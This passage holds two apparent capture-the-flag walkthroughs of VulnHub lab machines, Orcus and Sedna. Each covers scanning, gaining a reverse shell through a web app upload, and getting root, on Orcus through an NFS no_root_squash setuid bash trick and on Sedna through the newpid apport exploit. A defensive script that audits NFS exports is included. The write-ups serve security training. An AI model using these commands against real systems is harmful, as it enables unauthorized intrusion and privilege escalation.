| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 5.48 ms 172.16.94.136
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.34 seconds

I straight away went to port 80 and fired up nikto, and got a mouthful of interesting folders and web apps to follow up. I also fired up dirb to see if I could find any extra folders.
root@kali:/tmp# nikto -h http://172.16.94.136
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.94.136
+ Target Hostname: 172.16.94.136
+ Target Port: 80
+ Start Time: 2017-03-20 14:16:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53ff6086e56aa
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/exponent.js.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent.js2.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_bootstrap.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_constants.php' in robots.txt returned a non-forbidden or redirect HTTP code (500)
+ Entry '/exponent_php_setup.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_version.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/getswversion.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/login.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/overrides.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/site_rss.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/source_selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/thumb.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/ABOUT.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/CHANGELOG.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/CREDITS.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALLATION.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/README.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/RELEASE.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/TODO.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /files/: Directory indexing found.
+ Entry '/files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 30 entries which should be manually viewed.
+ Multiple index files found: /index.html, /index.php
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-2870: /index.php?download=/etc/passwd: Snif 1.2.4 allows any file to be retrieved from the web server.
+ OSVDB-59085: /index.php?|=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)
+ OSVDB-59085: /index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /files/: This might be interesting...
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3092: : This might be interesting... possibly a system shell found.
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /phpmyadmin/: phpMyAdmin directory found
+ 9338 requests: 0 error(s) and 48 item(s) reported on remote host
+ End Time: 2017-03-20 14:17:09 (GMT-4) (27 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

There are so many seemingly (or actually) vulnerable web apps, especially in the /external/ directory, that I'll never know for sure, so naturally I spent a long time here (so many wild goose chases).

At the URL http://172.16.94.136/backups/ I downloaded SimplePHPQuiz-Backupz.tar.gz but didn't have the permissions to download ssh-creds.bak. I somehow already knew it wouldn't amount to much. I extracted the folder, went to the configs folder and found database credentials.
 
<?php 
//Set the database access information as constants
DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');

@ $dbc = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);

if (mysqli_connect_error()){

    echo "Could not connect to MySql. Please try again";
    exit();

}
?>

With this I immediately went to http://172.16.94.136/phpmyadmin/ and logged in. Boom!!
Now we have credentials to phpMyAdmin; all that is left is to write a shell using MySQL, browse to it and then get a shell.....

except it didn't happen that way, as the credentials didn't have write permission to the web root. They didn't even have the FILE privilege. The VM is loaded with a few databases, so I decided to go through them one by one to see if there were backends to other web apps that we hadn't found in the enumeration phase. We were rewarded with the /zenphoto/ folder, an app that was missed by all my scanning and web brute-forcing attempts. I browsed to it and had to install it first. I used the credentials from SimplePHPQuiz-Backupz.tar.gz and successfully installed it.


At this point the plan was to find a place to upload a webshell and get a reverse connection. I did this by:
Plugins --> Uploader --> tick enable "elFinder", then Apply

Go to the Upload tab --> Click Files (elFinder) --> Zen photodata, right click on the pane on the right, click --> create new text and then paste in everyone's favorite php-reverse-shell.

After copying it, right click, Edit, and change the file extension to php; then right click again and click Open (remember to have set up a netcat listener). Then we'll get a limited reverse shell.



www-data@Orcus:/tmp/rooter$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Orcus:/tmp/rooter$ cd /var/www
cd /var/www
www-data@Orcus:/var/www$ ls
ls
9bd556e5c961356857d6d527a7973560-zen-cart-v1.5.4-12302014.zip
a0c4f0d176f87ceda9b9890af09ed644-Adem-master.zip
b873fef091715964d207daa19d320a99-zenphoto-zenphoto-1.4.10.tar.gz
flag.txt
html
zenphoto-zenphoto-1.4.10
www-data@Orcus:/var/www$ cd html
cd html
www-data@Orcus:/var/www/html$ ls
ls
ls: cannot open directory '.': Permission denied
www-data@Orcus:/var/www$ cat flag.txt
cat flag.txt
868c889965b7ada547fae81f922e45c4
www-data@Orcus:/var/www$

With the first flag in the bag, let's try to root this box. It took me a while to root it. I kept going away trying privilege escalation exploits, until this morning, when I came back to my nmap scans and found this:

2049/tcp open  nfs_acl     2-3 (RPC #100227)

I wonder why that didn't stick out to me in the first place. I quickly ran showmount.

root@kali:/tmp# showmount -e 172.16.94.136
Export list for 172.16.94.136:
/tmp *
 
I then checked the /etc/exports file and found that the NFS share was configured with no_root_squash:

www-data@Orcus:/$ cat /etc/exports
cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#        to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/tmp *(rw,no_root_squash) 


On our Kali box, we mount the export:
root@kali:~# rm -rf /mnt/orcus/
root@kali:~# mkdir /mnt/orcus
root@kali:~# mount -t nfs -o proto=tcp,port=2049 172.16.94.136:/tmp /mnt/orcus
root@kali:~# touch /mnt/orcus/rooter
root@kali:~# chmod 777 /mnt/orcus/rooter

On our limited shell on Orcus we copy bash into the newly created world-writable /tmp/rooter:
www-data@Orcus:/$ cp /bin/bash /tmp/rooter

We head back to our Kali box and set the setuid bit on the /tmp/rooter file (the shell):
root@kali:~# chmod 4777 /mnt/orcus/rooter

We head into the /tmp folder, check that the bit has been set, and then execute rooter with the -p option so that bash keeps the effective uid instead of dropping it, which gets us root privileges. :-)


www-data@Orcus:/$ ls -al
total 1124
drwxrwxrwt 10 root root 4096 Mar 27 08:45 .
drwxr-xr-x 24 root root 4096 Oct 30 23:05 ..
drwxrwxrwt 2 root root 4096 Mar 27 08:36 .ICE-unix
drwxrwxrwt 2 root root 4096 Mar 27 08:36 .Test-unix
drwxrwxrwt 2 root root 4096 Mar 27 08:36 .X11-unix
drwxrwxrwt 2 root root 4096 Mar 27 08:36 .XIM-unix
drwxrwxrwt 2 root root 4096 Mar 27 08:36 .font-unix
-rwsrwxrwx 1 root root 1109564 Mar 27 08:50 rooter
drwx------ 3 root root 4096 Mar 27 08:36 systemd-private-9349aed2336c4fd5ad8749398e923f3c-dovecot.service-YyhShT
drwx------ 3 root root 4096 Mar 27 08:36 systemd-private-9349aed2336c4fd5ad8749398e923f3c-systemd-timesyncd.service-ENaVWk
drwx------ 2 root root 4096 Mar 27 08:36 vmware-root
www-data@Orcus:/$ ./rooter -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
cd /root
ls
flag.txt
cat flag.txt
807307b49314f822985d0410de7d8bfe
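The /etc/exports weakness used above, seen from the defender's side: an added example that is not part of the original write-up. It audits an exports(5) file for read-write exports open to every client and for no_root_squash, and lists setuid/setgid files under an exported directory. The sample exports file is constructed to mirror the Orcus one, and the function names are my own.

```shell
#!/bin/sh
# Added example, not part of the original write-up: audit an exports(5) file
# for the weak setting that made Orcus rootable (a share exported to every
# client, read-write, with no_root_squash) and list setuid/setgid files in an
# exported directory (the /tmp/rooter pattern). Run it on the NFS server.

# audit_exports FILE: prints one "RISK <path> <client> <reason>" line per
# finding; returns 0 when nothing risky was found, 1 otherwise.
audit_exports() {
    findings=$(
        set -f   # a bare "*" client must not glob the current directory
        # drop comments and blank lines; a line is "PATH client(opts) ..."
        sed -e 's/#.*//' -e '/^[[:space:]]*$/d' "$1" |
        while read -r path clients; do
            for spec in $clients; do
                host=${spec%%"("*}              # "*", a host, or a network
                opts=${spec#"$host"}            # "(rw,no_root_squash)" or empty
                opts=${opts#"("}; opts=${opts%")"}
                case ",$opts," in
                    *,no_root_squash,*)
                        echo "RISK $path $host no_root_squash: client root keeps uid 0" ;;
                esac
                if [ "$host" = '*' ] || [ -z "$host" ]; then
                    case ",$opts," in
                        *,rw,*) echo "RISK $path $host rw export open to any client" ;;
                    esac
                fi
            done
        done
    )
    [ -z "$findings" ] && return 0
    printf '%s\n' "$findings"
    return 1
}

# list_setuid_in DIR: print setuid/setgid regular files below DIR.
list_setuid_in() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# Constructed sample mirroring the Orcus /etc/exports, written to a temp file
# so the demo runs offline.
SAMPLE_EXPORTS=$(mktemp)
cat > "$SAMPLE_EXPORTS" <<'EOF'
# /etc/exports: the access control list for filesystems which may be exported
/srv/homes   hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
/tmp *(rw,no_root_squash)
EOF

audit_exports "$SAMPLE_EXPORTS" ||
    echo "==> remediate: drop no_root_squash, name the clients, prefer ro"
```

On the constructed sample only the /tmp line is reported (twice: once for no_root_squash, once for the rw wildcard); the /srv/homes line with named clients is clean.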

It was a great challenge that emphasized the importance of an organized approach as opposed to a randomized one. Thanks to Viper for the awesome challenge and of course g0tmi1k and the whole vulnhub community who keep the war games coming.

Monday, March 20, 2017

Solving hackfest2016: Sedna VM

First, I scanned the box.

root@kali:/tmp# nmap -sT -A -P0 172.16.94.135
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-17 14:29 EDT
Nmap scan report for 172.16.94.135
Host is up (0.00055s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
| 2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
|_ 256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
53/tcp open domain ISC BIND 9.9.5-3-Ubuntu
| dns-nsid:
|_ bind.version: 9.9.5-3-Ubuntu
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3?
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 38660/udp status
|_ 100024 1 46739/tcp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: CAPABILITY
445/tcp open netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after: 2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3s?
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after: 2026-10-07T19:17:14
|_ssl-date: ERROR: Script execution failed (use -d to debug)
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 00:0C:29:68:AD:36 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 4.1.6-Ubuntu)
| NetBIOS computer name: SEDNA\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2017-03-17T14:31:40-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.55 ms 172.16.94.135
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.99 seconds
root@kali:~# us -mT -Iv 172.16.94.135:a -r 3000 -R 3 && us -mU -Iv 172.16.94.135:a -r 3000 -R 3
adding 172.16.94.135/32 mode `TCPscan' ports `a' pps 3000
using interface(s) eth0
scaning 1.00e+00 total hosts with 1.97e+05 total packets, should take a little longer than 1 Minutes, 12 Seconds
TCP open 172.16.94.135:22 ttl 64
TCP open 172.16.94.135:995 ttl 64
TCP open 172.16.94.135:111 ttl 64
TCP open 172.16.94.135:8080 ttl 64
TCP open 172.16.94.135:139 ttl 64
TCP open 172.16.94.135:110 ttl 64
TCP open 172.16.94.135:53 ttl 64
TCP open 172.16.94.135:993 ttl 64
TCP open 172.16.94.135:445 ttl 64
TCP open 172.16.94.135:143 ttl 64
TCP open 172.16.94.135:50201 ttl 64
TCP open 172.16.94.135:80 ttl 64
sender statistics 1908.1 pps with 196608 packets sent total
listener statistics 409090 packets recieved 0 packets droped and 0 interface drops
TCP open ssh[ 22] from 172.16.94.135 ttl 64
TCP open domain[ 53] from 172.16.94.135 ttl 64
TCP open http[ 80] from 172.16.94.135 ttl 64
TCP open pop3[ 110] from 172.16.94.135 ttl 64
TCP open sunrpc[ 111] from 172.16.94.135 ttl 64
TCP open netbios-ssn[ 139] from 172.16.94.135 ttl 64
TCP open imap[ 143] from 172.16.94.135 ttl 64
TCP open microsoft-ds[ 445] from 172.16.94.135 ttl 64
TCP open imaps[ 993] from 172.16.94.135 ttl 64
TCP open pop3s[ 995] from 172.16.94.135 ttl 64
TCP open http-alt[ 8080] from 172.16.94.135 ttl 64
TCP open unknown[50201] from 172.16.94.135 ttl 64
adding 172.16.94.135/32 mode `UDPscan' ports `a' pps 3000
using interface(s) eth0
scaning 1.00e+00 total hosts with 1.97e+05 total packets, should take a little longer than 1 Minutes, 12 Seconds
UDP open 172.16.94.135:53 ttl 64
UDP open 172.16.94.135:111 ttl 64
UDP open 172.16.94.135:137 ttl 64
UDP open 172.16.94.135:5353 ttl 255
sender statistics 1732.9 pps with 196635 packets sent total
listener statistics 36 packets recieved 0 packets droped and 0 interface drops
UDP open domain[ 53] from 172.16.94.135 ttl 64
UDP open sunrpc[ 111] from 172.16.94.135 ttl 64
UDP open netbios-ns[ 137] from 172.16.94.135 ttl 64
UDP open mdns[ 5353] from 172.16.94.135 ttl 255
root@kali:/tmp# nikto -h http://172.16.94.135
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.94.135
+ Target Hostname: 172.16.94.135
+ Target Port: 80
+ Start Time: 2017-03-17 14:37:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53fb059bb5bc8
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3092: /system/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ 7536 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2017-03-17 14:38:32 (GMT-4) (35 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:/tmp# nikto -h http://172.16.94.135:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.94.135
+ Target Hostname: 172.16.94.135
+ Target Port: 8080
+ Start Time: 2017-03-17 14:39:49 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ Server leaks inodes via ETags, header found with file /, fields: 0xW/1895 0x1475867860000
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 7839 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2017-03-17 14:40:30 (GMT-4) (41 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
As I was clicking around I found this: http://172.16.94.135/files/be_demo/blog/categories/newlogo.jpg
With this I searched exploit-db and found this. I first tried to upload directly using the Firefox plugin Poster, but the uploads kept getting renamed and PHP extensions were being filtered somehow.
So I decided to try uploading the exploit first, then use it to upload the php-reverse-shell. This got me a limited shell on the system.
root@kali:/tmp# nc -lvp 443
listening on [any] 443 ...
172.16.94.135: inverse host lookup failed: Unknown host
connect to [172.16.94.130] from (UNKNOWN) [172.16.94.135] 58774
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
14:57:01 up 2 days, 20 min, 0 users, load average: 0.00, 0.03, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
www-data@Sedna:/var/www$ cat flag.txt
cat flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289
www-data@Sedna:/var/www$
For privilege escalation I used taviso's exploit [CVE-2015-1318, newpid (apport)]. The link to the exploit can be found here.
www-data@Sedna:/tmp/sploits/expl$ gcc newpid.c -o newpid
gcc newpid.c -o newpid
newpid.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp]
# warning this file must be compiled with -static
^
www-data@Sedna:/tmp/sploits/expl$ ./newpid
./newpid
newpid: you *must* compile with -static
www-data@Sedna:/tmp/sploits/expl$ gcc newpid.c -o newpid -static
gcc newpid.c -o newpid -static
newpid.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp]
# warning this file must be compiled with -static
^
www-data@Sedna:/tmp/sploits/expl$ ./newpid
./newpid
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
# id
id
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
# pwd
pwd
/tmp/sploits/expl
# cd /root
cd /root
# ls
ls
8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip chkrootkit flag.txt
# cat flag.txt
cat flag.txt
a10828bee17db751de4b936614558305
#
Thanks to Viper for the awesome challenge and of course g0tmi1k and the whole vulnhub community who keep the war games coming.